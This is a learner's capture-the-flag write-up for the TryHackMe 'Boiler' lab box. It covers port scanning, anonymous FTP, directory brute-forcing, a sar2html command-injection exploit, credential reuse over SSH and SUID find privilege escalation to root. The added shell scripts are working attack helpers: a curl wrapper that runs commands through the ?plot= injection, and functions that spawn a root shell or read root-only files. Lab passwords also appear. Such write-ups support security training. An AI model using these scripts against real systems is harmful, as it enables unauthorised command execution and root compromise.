Cyber Security: An Offensive Mindset [Week 4 - Boiler CTF Write up]
TryHackMe: Boiler CTF - Write Up
- Initially my first task was enumeration of the target, to learn and discover as much as I could about it. This was a struggle because the VPN access to the server was not very cooperative. However, I found some workarounds to overcome what was thrown at me.
- One issue was the nmap scans taking way too long, but after discussing with my facilitators Max and Larry they nudged me in the right direction to use the -T4 or -T5 flag when conducting nmap scans. These are timing templates: they shorten how long nmap waits for a probe response before giving up and raise how many probes it sends in parallel, so a port that never answers is abandoned much sooner than under the default (-T3) settings, which is a lot more efficient. The trade-off is that -T5 can be too aggressive over a slow VPN link and miss ports that a slower scan would report.
-T4 or -T5 = use a faster timing template (shorter probe timeouts, more parallelism).
- Another issue that I faced when using nmap was the error message shown in the screenshot below, which wouldn't let me run a scan unless I used the -Pn flag: nmap's host discovery probes were going unanswered, so it reported the host as down and skipped it. I incorporated this flag in all my future scans, but it left me scratching my head for a while because I had done nmap scans previously without this issue.
-Pn = Disable host discovery (treat the host as up) and just scan for open ports.
- A scan that I found useful to uncover some quick information about the target was a fast scan using the -F flag. Since I was waiting for a full port scan in the background, it let me start understanding what was in fact at play.
-F = fast scan (only the 100 most common ports instead of the default 1000).
- The full scan that I waited for in the background was the most productive and uncovered a lot about the target: the open ports, the services running (with versions) and even the operating system in use, which was quite interesting.
-p- = Scan all 65535 TCP ports.
-Pn = Disable host discovery and just scan for open ports.
-T4 = Aggressive timing template (shorter probe timeouts, more parallelism).
-sV = Attempt to determine the version of the services running.
-sC = Scan with the default nmap scripts.
-oN <FileName.Extension> = Output scan results into a file in normal format (-oA writes normal, XML and grepable files at once).
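As an added example (not from the original write-up), the following shell script parses nmap's grepable output (-oG) so that questions like "which is the highest port running ssh" and "what is on port 10000" can be answered from the saved scan rather than by eyeballing it. The .gnmap content it writes is constructed to resemble the ports this write-up reports (21, 80, 10000, 55007); the version strings and IP are illustrative, not the actual scan results.

```sh
#!/bin/sh
# Added example: parse an nmap -oG (grepable) file. Not the write-up's own scan;
# the sample below is constructed to match the ports the write-up reports.

write_sample_gnmap() {
  # $1: output path. Version strings are illustrative, not the real Boiler results.
  printf '%s\n' '# Nmap 7.91 scan initiated as: nmap -p- -Pn -T4 -sV -sC -oG boiler.gnmap 10.10.201.165' > "$1"
  printf 'Host: 10.10.201.165 ()\tStatus: Up\n' >> "$1"
  printf 'Host: 10.10.201.165 ()\tPorts: %s\tIgnored State: closed (65531)\n' \
    '21/open/tcp//ftp//vsftpd 3.0.3/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 10000/open/tcp//http//MiniServ 1.930 (Webmin httpd)/, 55007/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)/' >> "$1"
}

open_ports() {
  # $1: .gnmap file. Prints "port proto service version" for each open port.
  # Each entry is port/state/proto/owner/service/rpcinfo/version/, so with '/' as
  # the separator the fields we want are $1, $3, $5 and $7. A comma inside a
  # version string would split an entry; nmap itself avoids emitting commas there.
  grep 'Ports:' "$1" |
    sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' |
    tr ',' '\n' |
    awk -F/ '$2 == "open" { sub(/^[ \t]+/, "", $1); printf "%s %s %s %s\n", $1, $3, $5, $7 }'
}

highest_port_for() {
  # $1: .gnmap file, $2: service name. Prints the highest open port running it.
  open_ports "$1" | awk -v svc="$2" '$3 == svc && $1 + 0 > max { max = $1 + 0 } END { if (max) print max }'
}

service_on_port() {
  # $1: .gnmap file, $2: port number. Prints "service version" for that port.
  open_ports "$1" | awk -v p="$2" '$1 == p { out = $3; for (i = 4; i <= NF; i++) out = out " " $i; print out }'
}

# Stand-alone demo on the constructed sample
f=$(mktemp)
write_sample_gnmap "$f"
open_ports "$f"
echo "highest ssh port: $(highest_port_for "$f" ssh)"
echo "port 10000 runs: $(service_on_port "$f" 10000)"
rm -f "$f"
```

Point open_ports at a real file produced with -oG (or the .gnmap from -oA) and the same helpers answer rounds 2 and 3 directly; the comment about commas is the one format caveat worth remembering when a version banner looks odd.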
Question 1 [Round 1]
- For this first round I was left really confused and stuck for a long period until I took a step back and did some research about ftp. Then I finally understood that you are able to log onto an ftp service as an anonymous user, which is what the reference to anon login was referring to.
- So we run ftp <IP>, which may take a few attempts as connection errors do occur (I found this out the hard way), so don't be discouraged.
- The errors you get will look like this (type exit and retry):
- Until you reach this (may take several attempts) and log in using the name anonymous (the password prompt accepts any value for an anonymous login):
- From here, once we are on the ftp service, the help command lists what commands are usable, as shown:
- I found that ls -la instead of a plain ls actually showed a hidden file called .info.txt (the ftp client passes the -la flags through to the server's LIST command, which is why dotfiles appear), so the answer to round 1 is .txt, that file's extension.
Question 1 [Round 2]
- This next round was quite easy: if we observe my previous nmap scan, as shown below, we can see that ssh is running on the highest port, 55007.
Question 1 [Round 3]
- Again, this round can easily be answered from the nmap scan above: on port 10000 the service webmin is running.
Question 1 [Round 4]
- The next round involved some research into whether this service can be exploited for its flaws. I initially looked on Exploit-DB for the version MiniServ 1.930 for any potential exploits, without any luck. The same happened when I searched for webmin 1.930, and there were no results when I searched Google either, so I answered nay.
Question 1 [Round 5]
- Next cab off the rank was round 5, which I found a bit odd. I wasn't sure what a CMS was, so I did some research and found that it is a Content Management System; the question was how to work out which CMS the web server was using. After a lot of struggling, and being pushed in the right direction by my facilitator Max, I decided to use gobuster to brute-force directory names on the web server to uncover anything interesting.
- After doing so, as seen below, we notice /joomla, which after further research I found is in fact a CMS and was the answer to this round.
Question 1 [Round 6]
- After a lot of enumeration, especially on the ftp server, I discovered a hidden file, as shown below, by running ls -la.
- However, when I attempted to vim or cat the file I wasn't able to, but after some research I discovered that inside the ftp client it needs a get <filename> - command (the trailing - sends the file to stdout instead of saving it locally) to print its contents to the terminal.
- After doing the above I found the contents below, which I guessed were encoded with ROT13, so I used CyberChef (an online tool) to decode the message, and sure enough it was a troll by the creator of this box: Just wanted to see if you find it. Lol. Remember: Enumeration is the key!
Question 1 [Round 7]
- My instincts told me that for this question we'd have to keep enumerating the joomla installation running on the web server to see if we can either exploit it or gain access to a user's account. So I did some research and found a Joomla scanner called joomscan that might be of use, so I gave it a go and it uncovered some basic information, as shown:
- After looking through the directories this tool discovered I still hadn't made any progress, as there weren't any interesting files in the administrator directories. So I continued researching to see if I could find any other ways to attack joomla, which is when I discovered DIRB:
- The scan that I ran was dirb http://10.10.201.165/joomla/ and I was honestly pleasantly surprised: some interesting directories were found by this tool inside of joomla, as you can see in the screenshot below.
- Within /_files/, after decoding the contents twice with base64, the output was Whopsie daisy, so just another rabbit hole.
- /_test/ was a different story. Finding sar2html there may mean there is a known exploit that can be used to run commands or read files. Sure enough, as seen in the screenshot below, Exploit-DB has a current exploit for sar2html.
- When I saw the exploit http://<IP>/index.php?plot=;<command here> I quickly compared it to the URL I was currently on in /_test, which is:
- After some experimentation I decided to change LINUX in the URL to ;ls, and sure enough, as you can see in the screenshot below, the contents of the current directory were listed: the plot parameter is handed to a shell, so the ; ends sar2html's own command and ours runs after it. The interesting file, and the answer to this round, is log.txt.
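Both rabbit holes above, the ROT13 .info.txt from round 6 and the double-base64 blob under /_files/ from round 7, can be handled from the shell without CyberChef. The helpers below are an added example and not part of the original write-up; every input in the script is a constructed string, not the files from the box.

```sh
#!/bin/sh
# Added decoding helpers (not the write-up's own code) for the ROT13 note found
# over ftp and the double-base64 file found under /joomla/_files/.

rot13() {
  # ROT13 is its own inverse, so one function both encodes and decodes.
  printf '%s' "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
}

looks_like_base64() {
  # Only the base64 alphabet, optional '=' padding, length a multiple of 4.
  printf '%s' "$1" | grep -Eq '^[A-Za-z0-9+/]+={0,2}$' && [ $(( ${#1} % 4 )) -eq 0 ]
}

peel_base64() {
  # $1: data, $2: maximum layers (default 5). Decodes base64 repeatedly while the
  # result still looks like base64, so nested encodings unwrap in one call and
  # plain text (which almost always contains a space or punctuation) stops it.
  data=$1; limit=${2:-5}; n=0
  while [ "$n" -lt "$limit" ] && looks_like_base64 "$data"; do
    decoded=$(printf '%s' "$data" | base64 -d 2>/dev/null) || break
    data=$decoded; n=$((n + 1))
  done
  printf '%s' "$data"
}

# Stand-alone demo with constructed inputs
rot13 'Whfg jnagrq gb frr vs lbh svaq vg.'; echo
nested=$(printf '%s' 'Whopsie daisy' | base64 | base64 | tr -d '\n')
peel_base64 "$nested"; echo
```

The layer limit matters: a decoded payload that happens to consist only of base64 characters would otherwise be decoded again into garbage, so cap the depth and inspect the intermediate output when the final result looks wrong.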
Question 2 [Round 1]
- Continuing where we left off in the previous round, if we change the injected command from ;ls to ;cat log.txt we can see whether the contents of the log file are of interest to us.
- After discovering the user details in the above log.txt file I went into a terminal and typed the following command: ssh basterd@10.10.219.146 -p 55007, and used the password superduperp@$$ when prompted, as shown:
- Once I was logged in as user basterd I ran ls to see if there were any interesting files, and what I found was a file called backup.sh.
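The browser quietly percent-encodes the URL when LINUX is replaced with ;ls, but the moment the injected command contains a space (as ;cat log.txt does) or is sent with curl, the encoding has to be done by hand. The script below is an added example, not the write-up's own tooling; the base URL is an assumption and should be the target's real /_test/ path.

```sh
#!/bin/sh
# Added example (not the write-up's code) for the sar2html ?plot= injection.
# The base URL below is an assumption; use the target's own /_test/ path.

urlencode() {
  # Percent-encode every byte outside the unreserved set so that ';' (which must
  # reach the server intact to act as a shell separator) and the space in
  # 'cat log.txt' survive the request when sent with curl rather than a browser.
  printf '%s\n' "$1" | fold -b -w1 | while IFS= read -r c; do
    case $c in
      '') ;;
      [A-Za-z0-9._~-]) printf '%s' "$c" ;;
      *) printf '%%%02X' "'$c" ;;
    esac
  done
}

sar2html_url() {
  # $1: URL of the sar2html directory, $2: command to run on the target.
  # The ';' terminates sar2html's own shell command so ours runs after it,
  # which is what changing LINUX to ';ls' in the browser did.
  printf '%s/index.php?plot=%s' "${1%/}" "$(urlencode ";$2")"
}

sar2html_exec() {
  # Send the request; the command's output comes back embedded in the HTML page.
  curl -s "$(sar2html_url "$1" "$2")"
}

# Stand-alone demo: print the URLs that would be requested (no network needed)
sar2html_url 'http://10.10.201.165/joomla/_test/' 'ls'; echo
sar2html_url 'http://10.10.201.165/joomla/_test/' 'cat log.txt'; echo
```

sar2html_exec returns the whole page, so pipe it through something like sed to strip the HTML around the command output; the important part is that %3B and %20 arrive at the server as ; and space, which is exactly what an unencoded curl request would get wrong.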
Question 2 [Round 2]
- From here I used cat to see the contents of this file, in case there was something suspicious inside. As seen below, I found another user's name and credentials, which will allow me to ssh as that user.
- The user that I will attempt to log in as using ssh is stoner, and the password for this user is superduperp@$$no1knows.
- After some poking around I was greeted with this message when I found .secret and used cat to see its contents.
- This was very frustrating because I didn't understand that the answer was actually right there in front of me the entire time: You made it till here, well done. is the answer for round 2.
Question 2 [Round 3]
- This next round was quite straightforward once I did some research and found the following command, which enumerates all binaries with the SUID bit set: find / -perm -u=s -type f 2>/dev/null.
- When the command is run these are the results, as shown below; I found it very interesting that this list is accessible to any user.
- After some extra research I uncovered that /usr/bin/find can actually be abused for privilege escalation, as shown below (a SUID find runs whatever -exec is given with the privileges of the file's owner):
- I tried this for myself on the system I was targeting and sure enough it actually worked; as you can see I got the exact same result. This meant that find was the correct answer to round 3.
Question 2 [Round 4]
- After a lot of trial and error I tried to use the command I discovered in round 3 again, but this time to show what is hidden in root, essentially to find root.txt, which this round 4 task requires, so I found myself attempting the following:
- After a lot of trial and error, I decided to try the same command but without the "double quotes", because it didn't seem to allow any command apart from whoami to run. Sure enough it worked, YABADABADOOOO! (Quoting the whole command makes find look for a single executable whose name is the entire quoted string, so the command and its arguments have to be passed as separate unquoted words.)
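As an added example (not the write-up's own commands) for rounds 3 and 4, the script below wraps the SUID hunt so the output shows the owner of each binary, flags names that GTFOBins documents as able to spawn a shell from a SUID context, and carries the quoting lesson from round 4 into the -exec form. The GTFOBins name list is a short illustrative subset, the sh -p and -quit usage is the form GTFOBins gives for find, and the temporary directory in the test is constructed; on a target you would search / instead.

```sh
#!/bin/sh
# Added example (not the write-up's commands) for the SUID hunt in rounds 3 and 4.

list_suid() {
  # $1: directory to search (/ on the target). Prints "owner path" for each
  # setuid file; stderr is dropped so unreadable directories don't flood the output.
  find "$1" -perm -u=s -type f 2>/dev/null | while IFS= read -r p; do
    owner=$(ls -ld "$p" | awk '{ print $3 }')
    printf '%s %s\n' "$owner" "$p"
  done
}

flag_abusable() {
  # Reads "owner path" lines and keeps those whose basename GTFOBins lists as able
  # to spawn a shell from SUID. The list is a short illustrative subset; a real
  # hunt checks each unusual binary against GTFOBins by hand.
  while IFS= read -r line; do
    path=${line##* }
    case ${path##*/} in
      find|vim|bash|env|python|python3|perl|nmap|awk|gawk) printf '%s\n' "$line" ;;
    esac
  done
}

find_root_shell() {
  # $1: path of the SUID find. -exec runs as the file owner (root); sh -p keeps
  # that effective uid instead of dropping it, and -quit stops after one hit.
  "$1" . -exec /bin/sh -p \; -quit
}

find_read_file() {
  # $1: path of the SUID find, $2: file to read, e.g. /root/root.txt.
  # The command after -exec must be separate words: "cat /root/root.txt" in
  # quotes makes find look for a binary of that literal name and fail.
  "$1" . -exec cat "$2" \; -quit
}

# Stand-alone demo against the system's own binaries
list_suid /usr/bin | flag_abusable
```

On the box, list_suid / | flag_abusable surfaces /usr/bin/find owned by root, find_read_file /usr/bin/find /root/root.txt reads the round 4 flag, and find_root_shell /usr/bin/find gives the root shell; the -p on sh is what stops the shell from discarding the effective uid that the SUID bit granted.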
TryHackMe: Boiler CTF [COMPLETED]